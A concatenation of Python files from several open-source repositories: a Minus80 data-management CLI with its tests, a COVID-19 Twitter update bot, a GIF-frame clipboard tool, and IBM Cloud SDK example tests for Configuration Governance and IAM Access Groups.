@click.argument("name", metavar="<name>")
@click.option("--raw", is_flag=True, default=False, help="Flag to list raw data")
def remove(dtype, name, raw):
"""
Delete a minus80 dataset from the cloud.
"""
cloud = m80.CloudData()
cloud.remove(dtype, name, raw)
cloud.add_command(login)
cloud.add_command(list)
cloud.add_command(push)
cloud.add_command(pull)
cloud.add_command(remove)
@click.command(help='Additional information information')
def version():
print(f'Version: {m80.__version__}')
print(f'Installation Path: {m80.__file__}')
cli.add_command(version)
```
#### File: Minus80/minus80/Exceptions.py
```python
class M80Error(Exception):
def __init__(self,msg=''):
self.message = msg
class TagExistsError(M80Error):
pass
class TagDoesNotExistError(M80Error):
pass
class TagInvalidError(M80Error):
pass
class FreezableNameInvalidError(M80Error):
pass
class UnsavedChangesInThawedError(M80Error):
def __init__(self,msg='',new=None,changed=None,deleted=None):
super().__init__(msg)
self.new = new
self.changed = changed
self.deleted = deleted
class UserNotLoggedInError(M80Error):
pass
class UserNotVerifiedError(M80Error):
pass
```
#### File: Minus80/tests/conftest.py
```python
import pytest
from minus80 import Accession
from minus80 import Cohort
#from minus80 import CloudData
from minus80.Tools import *
#@pytest.fixture(scope="module")
#def simpleCloudData():
# return CloudData()
@pytest.fixture(scope="module")
def simpleAccession():
# Create a simple Accession
return Accession("Sample1", files=["file1.txt", "file2.txt"], type="sample")
@pytest.fixture(scope="module")
def RNAAccession1():
a = Accession(
"RNAAccession1",
files=[
"./data/Sample1_ATGTCA_L007_R1_001.fastq",
"./data/Sample1_ATGTCA_L007_R2_001.fastq",
"./data/Sample1_ATGTCA_L008_R1_001.fastq",
"./data/Sample1_ATGTCA_L008_R2_001.fastq",
],
type="RNASeq",
)
return a
@pytest.fixture(scope="module")
def RNAAccession2():
a = Accession(
"RNAAccession2",
files=[
"./data/Sample2_ATGTCA_L005_R1_001.fastq",
"./data/Sample2_ATGTCA_L005_R2_001.fastq",
"./data/Sample2_ATGTCA_L006_R1_001.fastq",
"./data/Sample2_ATGTCA_L006_R2_001.fastq",
],
type="RNASeq",
)
return a
@pytest.fixture(scope="module")
def RNACohort(RNAAccession1, RNAAccession2):
delete("Cohort", "RNACohort", force=True)
x = Cohort("RNACohort")
x.add_accession(RNAAccession1)
x.add_accession(RNAAccession2)
return x
@pytest.fixture(scope="module")
def simpleCohort():
delete("Cohort", "TestCohort", force=True)
# Create the simple cohort
a = Accession("Sample1", files=["file1.txt", "file2.txt"], type="WGS")
b = Accession("Sample2", files=["file1.txt", "file2.txt"], type="WGS")
c = Accession("Sample3", files=["file1.txt", "file2.txt"], type="CHIP")
d = Accession("Sample4", files=["file1.txt", "file2.txt"], type="CHIP")
x = Cohort("TestCohort")
for acc in [a, b, c, d]:
x.add_accession(acc)
return x
```
#### File: Minus80/tests/test_Cohort.py
```python
import pytest
from minus80 import Accession, Cohort
def test_init(simpleCohort, RNACohort):
x = simpleCohort
assert isinstance(x, Cohort)
def test_repr(simpleCohort):
x = repr(simpleCohort)
def test_get_AID_from_name(simpleCohort):
assert simpleCohort._get_AID("Sample1") == 1
def test_get_AID(simpleCohort):
aid_map = simpleCohort._AID_mapping["Sample1"] == 1
def test_add_accession(simpleCohort):
a = Accession("Sample4", files=["file1.txt", "file2.txt"], type="CHIP")
if a in simpleCohort:
del simpleCohort[a]
start_len = len(simpleCohort)
simpleCohort.add_accession(a)
assert len(simpleCohort) == start_len + 1
def test_delitem(simpleCohort):
a = Accession("TESTSAMPLE_IGNORE", files=["file1.txt", "file2.txt"], type="CHIP")
if a not in simpleCohort:
simpleCohort.add_accession(a)
start_len = len(simpleCohort)
del simpleCohort["TESTSAMPLE_IGNORE"]
assert len(simpleCohort) == start_len - 1
def test_getitem(simpleCohort):
x = simpleCohort["Sample1"]
assert isinstance(x, Accession)
def test_len(simpleCohort):
assert isinstance(len(simpleCohort), int)
def test_contains(simpleCohort):
assert "Sample1" in simpleCohort
def test_iter(simpleCohort):
for x in simpleCohort:
assert isinstance(x, Accession)
def test_random_accession(simpleCohort):
a = simpleCohort.random_accession()
assert isinstance(a, Accession)
def test_random_accessions(simpleCohort):
a = simpleCohort.random_accessions(n=2)
assert all([isinstance(k, Accession) for k in a])
def test_random_too_many_accessions(simpleCohort):
with pytest.raises(Exception) as e_info:
a = simpleCohort.random_accessions(n=200)
def test_random_accessions_replace(simpleCohort):
a = simpleCohort.random_accessions(n=2, replace=True)
assert all([isinstance(k, Accession) for k in a])
def test_from_accessions():
a = Accession("Sample1", files=["file1.txt", "file2.txt"], type="WGS")
b = Accession("Sample2", files=["file1.txt", "file2.txt"], type="WGS")
c = Accession("Sample3", files=["file1.txt", "file2.txt"], type="CHIP")
d = Accession("Sample4", files=["file1.txt", "file2.txt"], type="CHIP")
x = Cohort.from_accessions("TestCohort", [a, b, c, d])
``` |
{
"source": "jonahdf/covid-twitter-bot",
"score": 3
} |
#### File: covid-twitter-bot/src/post_tweets.py
```python
import tweepy
from dotenv import load_dotenv
import os
import definitions
import datetime
"""
load_env
Loads environment variables (of API keys)
returns: dictionary of variables
"""
def load_env():
env = {}
load_dotenv()
env["api_key"] = os.environ.get("API_KEY")
env["api_secret_key"] = os.environ.get("API_SECRET_KEY")
env["access_token"] = os.environ.get("ACCESS_TOKEN")
env["access_token_secret"] = os.environ.get("ACCESS_TOKEN_SECRET")
return env
"""
post
Creates Twitter thread with all defined regions
vars: Environment variables (for secret API keys)
"""
def post():
env = load_env()
auth = tweepy.OAuthHandler(env["api_key"], env["api_secret_key"])
auth.set_access_token(env["access_token"], env["access_token_secret"])
api = tweepy.API(auth)
# Posts tweets in all defined regions, with current images
regions_to_post = definitions.regions.keys()
media1 = api.media_upload(f"./images/maps/hosp.png")
media2 = api.media_upload(f"./images/maps/rt.png")
lastTweet = api.update_status(f"#COVID19 Automatic Daily Update - {datetime.date.today().strftime('%m/%d/%y')}\n\nSources:\nHHS: Hospitalizations and tests\nNYT: Cases and deaths", media_ids=[media1.media_id, media2.media_id])
for region in regions_to_post:
media1 = api.media_upload(f"./images/graphs/{region}.png")
media2 = api.media_upload(f"./images/tables/{region}.png")
media3 = api.media_upload(f"./images/rt/{region}.png")
if len(definitions.regions[region]) > 1 and region != "USA":
regionString = region + " (" + ", ".join(definitions.regions[region]) + ")"
else:
regionString = region
lastTweet = api.update_status(f"{regionString}", in_reply_to_status_id=lastTweet.id, auto_populate_reply_metadata=True,media_ids=[media1.media_id, media2.media_id, media3.media_id])
print(f"posted tweet: {regionString}")
``` |
{
"source": "jonaheinke/powerpoint_images_from_gif",
"score": 2
} |
#### File: jonaheinke/powerpoint_images_from_gif/image_extract_label.py
```python
version = "1.2"
# -------------------------------------------------------------------------------------------------------------------- #
# IMPORT #
# -------------------------------------------------------------------------------------------------------------------- #
import os, platform, operator, json, webbrowser, win32clipboard, PySimpleGUI as sg #https://pysimplegui.readthedocs.io/
from io import BytesIO
from PIL import Image, ImageDraw, ImageFont, UnidentifiedImageError #https://pillow.readthedocs.io/
# -------------------------------------------------------------------------------------------------------------------- #
# MISC SETUP #
# -------------------------------------------------------------------------------------------------------------------- #
def replace_name(value):
value["name"].replace("_", " ")
return value
sg.theme("GreenTan") #set theme for both windows
schema = {}
try: #https://cloudconvert.com/woff2-to-ttf
with open(os.path.join("res", "schema.json"), encoding = "utf-8-sig") as f:
try:
temp = json.load(f)
except json.decoder.JSONDecodeError:
sg.Popup("JSON file couldn't be decoded.", any_key_closes = True)
#schema = {key.replace("_", " "):replace_name(value) for key, value in temp.items()}
except:
sg.Popup("schema.json not found.", any_key_closes = True)
schema = dict(temp)
#TODO: name correction
'''
for group, sch_list in temp.items():
#for el in value:
#el["name"].replace("_", " ")
for sch_name, sch_def in sch_list.items():
schema[group.replace("_", " ")] = value
'''
# -------------------------------------------------------------------------------------------------------------------- #
# CHILD GUI #
# -------------------------------------------------------------------------------------------------------------------- #
#a ≡ b mod m
# | a ∈ list(ℤ) ∪ tuple(ℤ)
# | b ∈ tuple(ℕ\[m, ∞))
# | m ∈ ℕ*
def modulo(a, m):
return tuple(map(operator.mod, a, m))
def gettextsize(font, content):
return ([], 0, "") #font.getsize(content)
delimiter = "_"
def encode_descriptor(items):
return delimiter.join(map(lambda x: str(x).replace(delimiter, " "), items))
def decode_descriptor(string):
return string.split(delimiter)
def export_image(pre_image, sch, content = ""):
pre_image = pre_image.convert("RGBA")
with BytesIO() as output:
if sch:
image_size = (pre_image.width + sch["expand"][1] + sch["expand"][3], pre_image.height + sch["expand"][0] + sch["expand"][2])
with Image.new("RGBA", image_size, (0xFF,) * 3) as image:
image.alpha_composite(pre_image, modulo((sch["expand"][3], sch["expand"][0]), image_size)) #TODO: allow expand to be negative for cropping
with Image.open(os.path.join("res", sch["file"])).convert("RGBA") as label:#, label.rotate(int(sch["rotation"]) & 3 * 90) as rotated_label:
image.alpha_composite(label, modulo(sch["position"], image_size))
#print text
if content and "text" in sch:
text = sch["text"]
font = ImageFont.truetype(text["font"], text["size"])
widths, height, newcontent = gettextsize(font, content)
draw = ImageDraw.Draw(image)
for width in widths:
draw.rectangle([(x0, y0), (x1, y1)] or [x0, y0, x1, y1], text["background"])
draw.multiline_text(xy, newcontent, text["color"], font, anchor, text["spacing"])
image.save(output, "BMP")
else:
pre_image.save(output, "BMP")
win32clipboard.OpenClipboard()
win32clipboard.EmptyClipboard()
win32clipboard.SetClipboardData(win32clipboard.CF_DIB, output.getvalue()[14:])
win32clipboard.CloseClipboard()
sg.PopupNoButtons("copied to clipboard", auto_close = True, auto_close_duration = 2, non_blocking = True, no_titlebar = True, keep_on_top = True)
def open_image(path):
#choose cursor for images on different platforms
platform_str = platform.system()
if platform_str == "Darwin":
image_cursor = "copy"
else:
image_cursor = "hand2"
#window
try:
with Image.open(path) as image:
#build layout
child_layout = [[sg.Radio("no schema", "SCHEMA", True, key = "radio", enable_events = True)],
[sg.Frame(group, [[sg.Radio(sch_name, "SCHEMA", key = encode_descriptor(["radio", group, sch_name]), enable_events = True)] for sch_name in sch_list.keys()], vertical_alignment = "top") for group, sch_list in schema.items()],
[sg.Input(size = (32, 1), disabled = True, key = "content")],
[sg.HorizontalSeparator()]]
scalar = 0.7
size = (int(image.width * scalar), int(image.height * scalar))
rows = (sg.Window.get_screen_size()[1] - 185) // (size[1] + 8)
"""
cols = 1
while ceil(image.n_frames / float(cols)) * (size[1] + 10) + 100 > sg.Window.get_screen_size()[1]:
cols += 1
"""
for i in range(rows): #image.n_frames, try getattr(image, "n_frames", 1) if it doesn't work
row = []
j = 0
while (index := i + j * rows) < image.n_frames:
image.seek(index)
with BytesIO() as dat, image.resize(size) as scaled_image:
scaled_image.save(dat, "PNG")
row.append(sg.Image(data = dat.getvalue(), background_color = "white", key = f"image_{index}", tooltip = "click: copy to clipboard", enable_events = True))
j += 1
child_layout.append(row)
#create window and handle its events
selected_schema = None
child_window = sg.Window("click on image to copy", child_layout, margins = (0, 3), force_toplevel = True).Finalize()
for i in range(image.n_frames):
child_window[f"image_{i}"].Widget.config(cursor = image_cursor)
while True:
event, values = child_window.read()
if event == sg.WIN_CLOSED:
break
elif isinstance(event, str):
dec = decode_descriptor(event)
if dec[0] == "image":
image.seek(int(dec[1]))
export_image(image, selected_schema)
elif dec[0] == "radio":
if len(dec) > 2:
selected_schema = schema[dec[1]][dec[2]]
child_window["content"].Update(disabled = "text" not in selected_schema)
else:
selected_schema = None
child_window["content"].Update(disabled = True)
else:
print(event, values)
except FileNotFoundError:
sg.Popup("File not found.", any_key_closes = True)
except UnidentifiedImageError:
sg.Popup("Image file cannot be identified.", any_key_closes = True)
except TypeError:
sg.Popup("Image file type not supported.", any_key_closes = True)
except:
sg.Popup("Unknown error while opening picture.", any_key_closes = True)
# -------------------------------------------------------------------------------------------------------------------- #
# MAIN GUI #
# -------------------------------------------------------------------------------------------------------------------- #
layout = [[sg.Column([[sg.FileBrowse(tooltip = "open an image file", size = (15, 2), enable_events = True, key = "open")]]), sg.Column([[sg.Text("Version: " + version)]], element_justification = "right", expand_x = True)],
[sg.HorizontalSeparator()],
[sg.Text("(c) <NAME>, 2021", enable_events = True, key = "copyright"), sg.VerticalSeparator(), sg.Text("released under MIT license", enable_events = True, key = "license")]]
window = sg.Window("label & copy image frames", layout, margins = (0, 3)).Finalize()
window["copyright"].Widget.config(cursor = "hand2")
window["license"].Widget.config(cursor = "hand2")
while True:
event, values = window.read()
if event == "open" and values["open"]:
open_image(values["open"])
elif event and event.startswith("copyright"):
webbrowser.open("https://github.com/jonaheinke/powerpoint_images_from_gif")
elif event and event.startswith("license"):
webbrowser.open("https://github.com/jonaheinke/powerpoint_images_from_gif/blob/main/LICENSE")
elif event == sg.WIN_CLOSED:
break
else:
print(event, values)
``` |
{
"source": "JonahFarc/platform-services-python-sdk",
"score": 2
} |
#### File: platform-services-python-sdk/examples/test_configuration_governance_v1_examples.py
```python
import os
import uuid
import pytest
from ibm_cloud_sdk_core import ApiException, read_external_sources
from ibm_platform_services.configuration_governance_v1 import *
#
# This file provides an example of how to use the Configuration Governance service.
#
# The following configuration properties are assumed to be defined:
#
# CONFIGURATION_GOVERNANCE_URL=<service url>
# CONFIGURATION_GOVERNANCE_AUTHTYPE=iam
# CONFIGURATION_GOVERNANCE_APIKEY=<IAM api key of user with authority to create rules>
# CONFIGURATION_GOVERNANCE_AUTH_URL=<IAM token service URL - omit this if using the production environment>
# CONFIGURATION_GOVERNANCE_ACCOUNT_ID=<the id of the account under which rules/attachments should be created>
# CONFIGURATION_GOVERNANCE_EXAMPLE_SERVICE_NAME=<the name of the service to be associated with rule>
# CONFIGURATION_GOVERNANCE_ENTERPRISE_SCOPE_ID=<the id of the "enterprise" scope to be used in the examples>
# CONFIGURATION_GOVERNANCE_SUBACCT_SCOPE_ID=<the id of the "leaf account" scope to be used in the examples>
#
# These configuration properties can be exported as environment variables, or stored
# in a configuration file and then:
# export IBM_CREDENTIALS_FILE=<name of configuration file>
#
config_file = 'configuration_governance.env'
configuration_governance_service = None
config = None
# Variables to hold link values
attachment_etag_link = None
attachment_id_link = None
rule_etag_link = None
rule_id_link = None
# Additional configuration settings
test_label = 'PythonSDKExamples'
account_id = None
service_name = None
enterprise_scope_id = None
subacct_scope_id = None
##############################################################################
# Start of Examples for Service: ConfigurationGovernanceV1
##############################################################################
# region
class TestConfigurationGovernanceV1Examples():
"""
Example Test Class for ConfigurationGovernanceV1
"""
@classmethod
def setup_class(cls):
global configuration_governance_service
if os.path.exists(config_file):
os.environ['IBM_CREDENTIALS_FILE'] = config_file
# begin-common
configuration_governance_service = ConfigurationGovernanceV1.new_instance(
)
# end-common
assert configuration_governance_service is not None
# Load the configuration
global config, account_id, service_name, enterprise_scope_id, subacct_scope_id
config = read_external_sources(
ConfigurationGovernanceV1.DEFAULT_SERVICE_NAME)
account_id = config['ACCOUNT_ID']
service_name = config['EXAMPLE_SERVICE_NAME']
enterprise_scope_id = config['ENTERPRISE_SCOPE_ID']
subacct_scope_id = config['SUBACCT_SCOPE_ID']
cls.clean_rules()
print('Setup complete.')
needscredentials = pytest.mark.skipif(
not os.path.exists(config_file),
reason="External configuration not available, skipping...")
@needscredentials
def test_create_rules_example(self):
"""
create_rules request example
"""
try:
print('\ncreate_rules() result:')
# begin-create_rules
target_resource_model = {
'service_name': service_name,
'resource_kind': 'service'
}
rule_required_config_model = {
'description': 'Public access check',
'property': 'public_access_enabled',
'operator': 'is_true'
}
enforcement_action_model = {'action': 'disallow'}
rule_request_model = {
'account_id': account_id,
'name': 'Disable public access',
'description':
'Ensure that public access to account resources is disabled.',
'target': {
'service_name': service_name,
'resource_kind': 'service'
},
'required_config': {
'description':
'Public access check',
'and': [{
'property': 'public_access_enabled',
'operator': 'is_false'
}]
},
'enforcement_actions': [enforcement_action_model],
'labels': [test_label]
}
create_rule_request_model = {
'request_id': '3cebc877-58e7-44a5-a292-32114fa73558',
'rule': {
'account_id':
account_id,
'name':
'Disable public access',
'description':
'Ensure that public access to account resources is disabled.',
'labels': [test_label],
'target': {
'service_name': service_name,
'resource_kind': 'service'
},
'required_config': {
'description':
'Public access check',
'and': [{
'property': 'public_access_enabled',
'operator': 'is_false'
}]
},
'enforcement_actions': [{
'action': 'disallow'
}, {
'action': 'audit_log'
}]
}
}
detailed_response = configuration_governance_service.create_rules(
rules=[create_rule_request_model])
create_rules_response = detailed_response.get_result()
if detailed_response.status_code == 207:
for responseEntry in create_rules_response['rules']:
if responseEntry['status_code'] > 299:
raise ApiException(
code=responseEntry['errors'][0]['code'],
message=responseEntry['errors'][0]['message'])
print(json.dumps(create_rules_response, indent=2))
# end-create_rules
global rule_id_link
rule_id_link = create_rules_response['rules'][0]['rule']['rule_id']
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_create_attachments_example(self):
"""
create_attachments request example
"""
try:
print('\ncreate_attachments() result:')
# begin-create_attachments
excluded_scope_model = {
'note': 'Development account',
'scope_id': subacct_scope_id,
'scope_type': 'enterprise.account'
}
attachment_request_model = {
'account_id': account_id,
'included_scope': {
'note': 'My enterprise',
'scope_id': enterprise_scope_id,
'scope_type': 'enterprise'
},
'excluded_scopes': [excluded_scope_model]
}
create_attachments_response = configuration_governance_service.create_attachments(
rule_id=rule_id_link,
attachments=[attachment_request_model]).get_result()
print(json.dumps(create_attachments_response, indent=2))
# end-create_attachments
global attachment_id_link
attachment_id_link = create_attachments_response['attachments'][0][
'attachment_id']
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_get_attachment_example(self):
"""
get_attachment request example
"""
try:
print('\nget_attachment() result:')
# begin-get_attachment
attachment = configuration_governance_service.get_attachment(
rule_id=rule_id_link,
attachment_id=attachment_id_link).get_result()
print(json.dumps(attachment, indent=2))
# end-get_attachment
global attachment_etag_link
attachment_etag_link = configuration_governance_service.get_attachment(
rule_id=rule_id_link,
attachment_id=attachment_id_link).get_headers().get('Etag')
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_get_rule_example(self):
"""
get_rule request example
"""
try:
print('\nget_rule() result:')
# begin-get_rule
rule = configuration_governance_service.get_rule(
rule_id=rule_id_link).get_result()
print(json.dumps(rule, indent=2))
# end-get_rule
global rule_etag_link
rule_etag_link = configuration_governance_service.get_rule(
rule_id=rule_id_link).get_headers().get('etag')
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_list_rules_example(self):
"""
list_rules request example
"""
try:
print('\nlist_rules() result:')
# begin-list_rules
rule_list = configuration_governance_service.list_rules(
account_id=account_id).get_result()
print(json.dumps(rule_list, indent=2))
# end-list_rules
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_update_rule_example(self):
"""
update_rule request example
"""
try:
print('\nupdate_rule() result:')
# begin-update_rule
rule_target_attribute_model = {
'name': 'testString',
'operator': 'string_equals'
}
target_resource_model = {
'service_name': service_name,
'resource_kind': 'service',
'additional_target_attributes': [rule_target_attribute_model]
}
rule_required_config_model = {
'property': 'public_access_enabled',
'operator': 'is_false'
}
enforcement_action_model = {'action': 'audit_log'}
rule = configuration_governance_service.update_rule(
rule_id=rule_id_link,
if_match=rule_etag_link,
name='Disable public access',
description=
'Ensure that public access to account resources is disabled.',
target={
'service_name': service_name,
'resource_kind': 'service',
'additional_target_attributes': []
},
required_config={
'property': 'public_access_enabled',
'operator': 'is_false'
},
enforcement_actions=[enforcement_action_model],
account_id=account_id,
rule_type='user_defined',
labels=['testString']).get_result()
print(json.dumps(rule, indent=2))
# end-update_rule
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_list_attachments_example(self):
"""
list_attachments request example
"""
try:
print('\nlist_attachments() result:')
# begin-list_attachments
attachment_list = configuration_governance_service.list_attachments(
rule_id=rule_id_link).get_result()
print(json.dumps(attachment_list, indent=2))
# end-list_attachments
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_update_attachment_example(self):
"""
update_attachment request example
"""
try:
print('\nupdate_attachment() result:')
# begin-update_attachment
excluded_scope_model = {
'note': 'Development account',
'scope_id': subacct_scope_id,
'scope_type': 'enterprise.account'
}
attachment = configuration_governance_service.update_attachment(
rule_id=rule_id_link,
attachment_id=attachment_id_link,
if_match=attachment_etag_link,
account_id=account_id,
included_scope={
'note': 'My enterprise',
'scope_id': enterprise_scope_id,
'scope_type': 'enterprise'
},
excluded_scopes=[excluded_scope_model]).get_result()
print(json.dumps(attachment, indent=2))
# end-update_attachment
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_delete_attachment_example(self):
"""
delete_attachment request example
"""
try:
# begin-delete_attachment
response = configuration_governance_service.delete_attachment(
rule_id=rule_id_link,
attachment_id=attachment_id_link).get_result()
# end-delete_attachment
print('\ndelete_attachment() response status code: ',
response.get_status_code())
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_delete_rule_example(self):
"""
delete_rule request example
"""
try:
# begin-delete_rule
response = configuration_governance_service.delete_rule(
rule_id=rule_id_link).get_result()
# end-delete_rule
print('\ndelete_rule() response status code: ',
response.get_status_code())
except ApiException as e:
pytest.fail(str(e))
@classmethod
def clean_rules(cls):
"""
Clean up rules from prior test runs
"""
try:
rule_list = configuration_governance_service.list_rules(
account_id=account_id,
labels=test_label,
).get_result()
for rule in rule_list['rules']:
rule_id = rule['rule_id']
print(f'deleting rule {rule_id}')
configuration_governance_service.delete_rule(rule_id)
except ApiException as e:
print(str(e))
# endregion
##############################################################################
# End of Examples for Service: ConfigurationGovernanceV1
##############################################################################
```
#### File: platform-services-python-sdk/examples/test_iam_access_groups_v2_examples.py
```python
import os
import pytest
from ibm_cloud_sdk_core import ApiException, read_external_sources
from ibm_platform_services.iam_access_groups_v2 import *
#
# This file provides an example of how to use the IAM Access Groups service.
#
# The following configuration properties are assumed to be defined:
#
# IAM_ACCESS_GROUPS_URL=<service url>
# IAM_ACCESS_GROUPS_AUTHTYPE=iam
# IAM_ACCESS_GROUPS_APIKEY=<your iam apikey>
# IAM_ACCESS_GROUPS_AUTH_URL=<IAM token service URL - omit this if using the production environment>
# IAM_ACCESS_GROUPS_TEST_ACCOUNT_ID=<id of an account used for testing>
#
# These configuration properties can be exported as environment variables, or stored
# in a configuration file and then:
# export IBM_CREDENTIALS_FILE=<name of configuration file>
#
config_file = 'iam_access_groups.env'
iam_access_groups_service = None
config = None
test_account_id = None
test_group_etag = None
test_group_id = None
test_claim_rule_id = None
test_claim_rule_etag = None
##############################################################################
# Start of Examples for Service: IamAccessGroupsV2
##############################################################################
# region
class TestIamAccessGroupsV2Examples():
"""
Example Test Class for IamAccessGroupsV2
"""
@classmethod
def setup_class(cls):
global iam_access_groups_service
if os.path.exists(config_file):
os.environ['IBM_CREDENTIALS_FILE'] = config_file
# begin-common
iam_access_groups_service = IamAccessGroupsV2.new_instance()
# end-common
assert iam_access_groups_service is not None
# Load the configuration
global config, test_account_id
config = read_external_sources(
IamAccessGroupsV2.DEFAULT_SERVICE_NAME)
test_account_id = config['TEST_ACCOUNT_ID']
print('Setup complete.')
needscredentials = pytest.mark.skipif(
not os.path.exists(config_file), reason="External configuration not available, skipping..."
)
@needscredentials
def test_create_access_group_example(self):
"""
create_access_group request example
"""
try:
print('\ncreate_access_group() result:')
# begin-create_access_group
group = iam_access_groups_service.create_access_group(
account_id=test_account_id,
name='Managers',
description='Group for managers'
).get_result()
print(json.dumps(group, indent=2))
# end-create_access_group
global test_group_id
test_group_id = group['id']
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_get_access_group_example(self):
"""
get_access_group request example
"""
try:
print('\nget_access_group() result:')
# begin-get_access_group
response = iam_access_groups_service.get_access_group(
access_group_id=test_group_id
)
group = response.get_result()
print(json.dumps(group, indent=2))
# end-get_access_group
global test_group_etag
test_group_etag = response.get_headers().get('Etag')
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_update_access_group_example(self):
"""
update_access_group request example
"""
try:
print('\nupdate_access_group() result:')
# begin-update_access_group
group = iam_access_groups_service.update_access_group(
access_group_id=test_group_id,
if_match=test_group_etag,
name='Awesome Managers',
description='Group for awesome managers'
).get_result()
print(json.dumps(group, indent=2))
# end-update_access_group
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_list_access_groups_example(self):
"""
list_access_groups request example
"""
try:
print('\nlist_access_groups() result:')
# begin-list_access_groups
groups_list = iam_access_groups_service.list_access_groups(
account_id=test_account_id
).get_result()
print(json.dumps(groups_list, indent=2))
# end-list_access_groups
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_add_members_to_access_group_example(self):
"""
add_members_to_access_group request example
"""
try:
print('\nadd_members_to_access_group() result:')
# begin-add_members_to_access_group
member1 = AddGroupMembersRequestMembersItem(
iam_id='IBMid-user1', type='user')
member2 = AddGroupMembersRequestMembersItem(
iam_id='iam-ServiceId-123', type='service')
members = [member1, member2]
add_group_members_response = iam_access_groups_service.add_members_to_access_group(
access_group_id=test_group_id,
members=members
).get_result()
print(json.dumps(add_group_members_response, indent=2))
# end-add_members_to_access_group
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_is_member_of_access_group_example(self):
"""
is_member_of_access_group request example
"""
try:
# begin-is_member_of_access_group
response = iam_access_groups_service.is_member_of_access_group(
access_group_id=test_group_id,
iam_id='IBMid-user1'
)
# end-is_member_of_access_group
print('\nis_member_of_access_group() response status code: ', response.get_status_code())
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_list_access_group_members_example(self):
"""
list_access_group_members request example
"""
try:
print('\nlist_access_group_members() result:')
# begin-list_access_group_members
group_members_list = iam_access_groups_service.list_access_group_members(
access_group_id=test_group_id
).get_result()
print(json.dumps(group_members_list, indent=2))
# end-list_access_group_members
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_remove_member_from_access_group_example(self):
"""
remove_member_from_access_group request example
"""
try:
# begin-remove_member_from_access_group
response = iam_access_groups_service.remove_member_from_access_group(
access_group_id=test_group_id,
iam_id='IBMid-user1'
)
# end-remove_member_from_access_group
print('\nremove_member_from_access_group() response status code:', response.get_status_code())
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_remove_members_from_access_group_example(self):
"""
remove_members_from_access_group request example
"""
try:
print('\nremove_members_from_access_group() result:')
# begin-remove_members_from_access_group
delete_group_bulk_members_response = iam_access_groups_service.remove_members_from_access_group(
access_group_id=test_group_id,
members=['iam-ServiceId-123']
).get_result()
print(json.dumps(delete_group_bulk_members_response, indent=2))
# end-remove_members_from_access_group
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_add_member_to_multiple_access_groups_example(self):
"""
add_member_to_multiple_access_groups request example
"""
try:
print('\nadd_member_to_multiple_access_groups() result:')
# begin-add_member_to_multiple_access_groups
add_membership_multiple_groups_response = iam_access_groups_service.add_member_to_multiple_access_groups(
account_id=test_account_id,
iam_id='IBMid-user1',
type='user',
groups=[test_group_id]
).get_result()
print(json.dumps(add_membership_multiple_groups_response, indent=2))
# end-add_member_to_multiple_access_groups
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_remove_member_from_all_access_groups_example(self):
"""
remove_member_from_all_access_groups request example
"""
try:
print('\nremove_member_from_all_access_groups() result:')
# begin-remove_member_from_all_access_groups
delete_from_all_groups_response = iam_access_groups_service.remove_member_from_all_access_groups(
account_id=test_account_id,
iam_id='IBMid-user1'
).get_result()
print(json.dumps(delete_from_all_groups_response, indent=2))
# end-remove_member_from_all_access_groups
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_add_access_group_rule_example(self):
"""
add_access_group_rule request example
"""
try:
print('\nadd_access_group_rule() result:')
# begin-add_access_group_rule
rule_conditions_model = {
'claim': 'isManager',
'operator': 'EQUALS',
'value': 'true'
}
rule = iam_access_groups_service.add_access_group_rule(
access_group_id=test_group_id,
name='Manager group rule',
expiration=12,
realm_name='https://idp.example.org/SAML2"',
conditions=[rule_conditions_model]
).get_result()
print(json.dumps(rule, indent=2))
# end-add_access_group_rule
global test_claim_rule_id
test_claim_rule_id = rule['id']
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_get_access_group_rule_example(self):
"""
get_access_group_rule request example
"""
try:
print('\nget_access_group_rule() result:')
# begin-get_access_group_rule
response = iam_access_groups_service.get_access_group_rule(
access_group_id=test_group_id,
rule_id=test_claim_rule_id
)
rule = response.get_result()
print(json.dumps(rule, indent=2))
# end-get_access_group_rule
global test_claim_rule_etag
test_claim_rule_etag = response.get_headers().get('Etag')
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_replace_access_group_rule_example(self):
"""
replace_access_group_rule request example
"""
try:
print('\nreplace_access_group_rule() result:')
# begin-replace_access_group_rule
rule_conditions_model = {
'claim': 'isManager',
'operator': 'EQUALS',
'value': 'true'
}
rule = iam_access_groups_service.replace_access_group_rule(
access_group_id=test_group_id,
rule_id=test_claim_rule_id,
if_match=test_claim_rule_etag,
name='Manager group rule',
expiration=24,
realm_name='https://idp.example.org/SAML2',
conditions=[rule_conditions_model]
).get_result()
print(json.dumps(rule, indent=2))
# end-replace_access_group_rule
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_list_access_group_rules_example(self):
"""
list_access_group_rules request example
"""
try:
print('\nlist_access_group_rules() result:')
# begin-list_access_group_rules
rules_list = iam_access_groups_service.list_access_group_rules(
access_group_id=test_group_id
).get_result()
print(json.dumps(rules_list, indent=2))
# end-list_access_group_rules
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_remove_access_group_rule_example(self):
"""
remove_access_group_rule request example
"""
try:
# begin-remove_access_group_rule
response = iam_access_groups_service.remove_access_group_rule(
access_group_id=test_group_id,
rule_id=test_claim_rule_id
)
# end-remove_access_group_rule
print('\nremove_access_group_rule() response status code:', response.get_status_code())
except ApiException as e:
pytest.fail(str(e))
@needscredentials
def test_get_account_settings_example(self):
"""
get_account_settings request example
"""
try:
print('\nget_account_settings() result:')
# begin-get_account_settings
